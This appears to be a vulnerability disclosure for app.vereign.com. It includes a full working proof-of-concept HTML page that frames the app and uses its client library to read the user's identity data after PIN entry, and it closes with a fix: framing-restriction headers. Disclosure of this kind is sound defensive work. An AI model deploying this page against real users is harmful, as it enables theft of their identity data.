An attacker can host a page that embeds app.vereign.com in an iframe and obtain the user's data if the user enters their PIN code while that page is open.
Example:
The fake.html code is:
<!DOCTYPE html>
<!-- Proof-of-concept page from the report: a third-party page that embeds
     app.vereign.com and reads identity data through the product's own client
     library after the user has authenticated in the visible frame below. -->
<html lang="en">
<head>
<meta name="robots" content="noindex">
<style>
/* Iframes are hidden by default; the visible one at the bottom of <body>
   overrides this with an inline display:block. */
html, body {
height: 100%;
}
body {
margin: 0;
padding: 0;
overflow: hidden;
}
iframe {
display: none;
width: 100%;
height: 100%;
}
</style>
</head>
<body>
<!-- The client library is loaded from app.vereign.com itself, so this page
     goes through the supported integration path rather than anything exotic. -->
<script src="https://app.vereign.com/vcl/js/client"></script>
<script>
// Initialise the client inside this (third-party) origin. The first argument
// names the container div further down; the URLs appear to point the library
// at the app's iframe endpoint, REST API and WOPI endpoint — the library's
// contract is not shown on this page, so confirm against its documentation.
window.setupViamAPI(
"hackDiv",
{
onEvent: () => {}
},
"https://app.vereign.com/vcl/js/iframe",
"https://app.vereign.com/api/",
"https://app.vereign.com/wopi/",
"https://app.vereign.com"
).then(async function(lib) {
window.lib = lib;
console.log("Injected: Lib is initialized");
// Per the report these calls return the logged-in user's identity data;
// the embedding page, not the user, now holds it. The PoC only logs it.
var identities = await lib.listIdentities();
console.log("Injected: User identities: ", identities);
var currentUUID = await lib.getCurrentlyLoggedInUUID();
console.log("Injected: Current UUID: ", currentUUID.data);
var entity = await lib.entityGetEntity(currentUUID.data);
console.log("Injected: Current entity: ", entity);
// Re-reads the entity every 5000 ms for as long as the tab stays open;
// the report does not say why it polls.
setInterval(async function() {
var entity = await lib.entityGetEntity(currentUUID.data);
console.log("Injected: Current entity: ", entity);
}, 5000);
});
</script>
<!-- Mount point named by the first setupViamAPI argument. -->
<div id="hackDiv"></div>
<!-- The visible frame; presumably where the user enters the PIN code in the
     report's scenario. Mitigation: the response for this document needs
     X-Frame-Options: sameorigin (the CSP equivalent is
     Content-Security-Policy: frame-ancestors 'self').
     NOTE(review): if /vcl/js/iframe is meant to be embedded by legitimate
     third-party sites, a blanket sameorigin on the whole origin would break
     them — confirm the intended scope; frame-ancestors with an allow-list
     covers that case. Detection: cross-origin framing is visible server-side
     as requests carrying Sec-Fetch-Dest: iframe with a foreign Referer. -->
<iframe style="display: block;" src="https://app.vereign.com"></iframe>
</body>
</html>
Solution:
Add an HTTP response header on app.vereign.com so that browsers refuse to render app.vereign.com inside an iframe on other origins:
X-Frame-Options: sameorigin